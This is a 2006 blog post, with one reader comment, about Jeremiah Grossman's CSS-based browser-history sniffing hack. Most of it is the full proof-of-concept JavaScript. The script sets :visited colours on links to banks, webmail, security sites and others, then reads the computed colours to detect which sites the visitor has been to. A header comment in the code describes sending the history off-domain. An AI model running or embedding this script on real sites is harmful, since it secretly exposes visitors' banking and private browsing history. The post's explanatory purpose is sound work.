Jeremiah Grossman tries to prove through a script that your browser history could be captured by websites that you visit. This is done through a CSS hack. This is the only time IE7 RC1 has been more secure than Firefox as IE7 blocks the script where as Firefox shows my entire history. The script it embedded on the page, and it appears that basic technique involves setting the visited link color via CSS on a group of links to common sites, and then getting the computed values of the links and seeing which ones have the visited color. Check out the embeded code.
<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);
// popular websites. Lookup if user has visited any.
var websites = [
"http://login.yahoo.com/",
"http://www.jailbabes.com",
"http://ha.ckers.org",
"http://seoblackhat.com",
"http://www.cgisecurity.com",
"http://www.spidynamics.com",
"http://www.cenzic.com",
"http://www.watchfire.com",
"http://www.ntobjectives.com",
"http://www.webappsec.org",
"http://www.whitehatsec.com",
"http://english.aljazeera.net/HomePage",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://my.yahoo.com/",
"http://slashdot.org/",
"http://www.myspace.com/",
"http://www.amazon.com/",
"http://www.aol.com/",
"http://www.bankofamerica.com/",
"http://www.bankone.com/",
"http://www.blackhat.com/",
"http://www.blogger.com/",
"http://www.bofa.com/",
"http://www.capitalone.com/",
"http://www.chase.com/",
"http://www.citibank.com/",
"http://www.cnn.com/",
"http://www.comerica.com/",
"http://www.e-gold.com/",
"http://www.ebay.com/",
"http://www.etrade.com/",
"http://www.google.com/",
"http://www.hsbc.com/",
"http://www.icq.com/",
"http://www.microsoft.com/",
"http://www.msn.com/",
"http://www.myspace.com/",
"http://www.passport.net/",
"http://www.paypal.com/",
"http://www.sourceforge.net/",
"http://www.statefarm.com/",
"http://www.usbank.com/",
"http://www.wachovia.com/",
"http://www.wamu.com/",
"http://www.wellsfargo.com/",
"http://www.xanga.com/",
"http://www.yahoo.com/",
"https://commerce.blackhat.com/",
"https:/banking.wellsfargo.com/",
];
/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
var d = document.createElement('div');
d.id = 'xss_flag';
document.body.appendChild(d);
var d = document.createElement('table');
d.border = 0;
d.cellpadding = 5;
d.cellspacing = 10;
d.width = '90%';
d.align = 'center';
d.id = 'data';
document.body.appendChild(d);
document.write('<style>');
for (var i = 0; i < websites.length; i++) {
document.write('#id' + i + ":visited {color: #0000FF;}");
}
document.write('</style>');
/* launch steal history */
if (is_mozilla) {
stealHistory();
}
}
/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL. #
-----------------------------------------------------------------------*/
function stealHistory() {
// loop through websites and check which ones have been visited
for (var i = 0; i < websites.length; i++) {
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];
document.body.appendChild(link);
var color = document.defaultView.getComputedStyle(link,null)
.getPropertyValue("color");
document.body.removeChild(link);
// check for visited
if (color == "rgb(0, 0, 255)") {
document.write('<li><a href="' + websites[i] + '">'
+ websites[i] + '</a></li>');
} // end visited check
} // end visited website loop
} // end stealHistory method
</script>Submit:
Loading ...
August 27th, 2006 at 11:47 am
This is a very interesting hack. It isn’t really a security flaw as much as an incredibly creative way to misuse designed features. I wonder how it will be fixed in Firefox. The only thing I could think of is disabling JavaScript’s ability to see what color a link is.
The thing is it is really impractical to try to grab more than a limited number of specific URLs, it isn’t like they can see the URLs of page that they don’t specifically create a link to the page to begin with.